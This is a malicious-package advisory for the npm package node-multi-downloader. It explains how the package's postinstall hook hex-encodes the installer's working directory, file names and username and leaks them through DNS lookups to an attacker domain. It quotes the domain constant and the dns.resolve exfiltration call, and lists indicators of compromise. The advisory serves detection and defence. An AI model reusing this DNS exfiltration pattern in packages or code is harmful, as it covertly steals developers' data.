MAL-2026-5735

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/node-multi-downloader/MAL-2026-5735.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-5735

Published

2026-06-13T07:04:03Z

Modified

2026-06-13T07:31:42.256186039Z

Summary

Malicious code in node-multi-downloader (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (8fc720cd970f4d19212ca90945b7fc1e4e1c64da98235ff595b3792ae69e3e68)

On npm install, this package's postinstall hook (node index.js) hex-encodes the installer's current working directory, the first 15 entries of that directory, and os.userInfo().username, and leaks each chunk via DNS A-record lookups to subdomains of the attacker-controlled domain uqlyosvp1f9.oob.evilsec.xyz. The hardcoded out-of-band domain is bound at index.js line 1 (const D = "uqlyosvp1f9.oob.evilsec.xyz") and index.js line 8 calls dns.resolve(${chunk}.${tag}${i}.${D}, 'A',...) to transmit the encoded data. DNS-subdomain encoding is a well-known technique to evade HTTP egress filtering. The package metadata (description "RSI package!", anonymous author, release-candidate version) provides no legitimate purpose that would justify reading installer filesystem and identity at install time.

Database specific

{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-006322",
            "versions": [
                "5.0.14-rc.3"
            ],
            "sha256": "77464387879005e5c35e332c1b9f9826ea1af7dec30cad7d06fe1023d553f1f4",
            "source": "amazon-inspector",
            "modified_time": "2026-06-13T07:04:03Z",
            "import_time": "2026-06-13T07:25:39.73129435Z"
        },
        {
            "id": "IN-MAL-2026-006321",
            "versions": [
                "5.0.14-rc.3"
            ],
            "sha256": "8fc720cd970f4d19212ca90945b7fc1e4e1c64da98235ff595b3792ae69e3e68",
            "source": "amazon-inspector",
            "modified_time": "2026-06-13T07:04:03Z",
            "import_time": "2026-06-13T07:25:39.675878525Z"
        }
    ]
}

References

https://www.npmjs.com/package/node-multi-downloader/v/5.0.14-rc.3

Credits

- Amazon Inspector - FINDER
- - inspector-research@amazon.com

Affected packages

npm / node-multi-downloader

Package

Name: node-multi-downloader; View open source insights on deps.dev
Purl: pkg:npm/node-multi-downloader

Affected ranges

Affected versions

5.*

5.0.14-rc.3

Database specific

indicators

{
    "evidence_files": [
        {
            "path": "index.js",
            "sha256": "3a87bc4174ea8f94807555d6841cfd778d5c6aa796a66a5ea78a2ae3721de89f",
            "tlsh": "01f050f923f5a1f494666480c1b48d0a2273cb121173c090b81d68d6abd38f4bbe6971"
        }
    ],
    "package_integrity": [
        {
            "filename": "node-multi-downloader-5.0.14-rc.3.tgz",
            "hashes": {
                "sha512_sri": "sha512-nRN1LlwWX0jlka6fweawaXGmfEE0UNh/zzNKCzmLEs4NdSRQKZCWVMpgL45REz8KEF1t25Pd09ZmlL4Ld0VQqg==",
                "sha1": "def4f059880087a00597558d8862a4171c2851b5"
            }
        }
    ],
    "ips": [
        "104.16.8.34",
        "10.1.0.2"
    ],
    "domains": [
        "2e6e706d2c6e6f64655f6d6f64756c65732c7061636b6167652d6c6f636b2e.fil0.uqlyosvp1f9.oob.evilsec.xyz",
        "6a736f6e2c7061636b6167652e6a736f6e.fil1.uqlyosvp1f9.oob.evilsec.xyz",
        "6c74692d646f776e6c6f61646572.cwd1.uqlyosvp1f9.oob.evilsec.xyz",
        "696e6465782e6a732c7061636b6167652e6a736f6e.fil0.uqlyosvp1f9.oob.evilsec.xyz",
        "7363616e.usr0.uqlyosvp1f9.oob.evilsec.xyz",
        "2f686f6d652f7363616e.cwd0.uqlyosvp1f9.oob.evilsec.xyz"
    ]
}

cwes

[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/node-multi-downloader/MAL-2026-5735.json"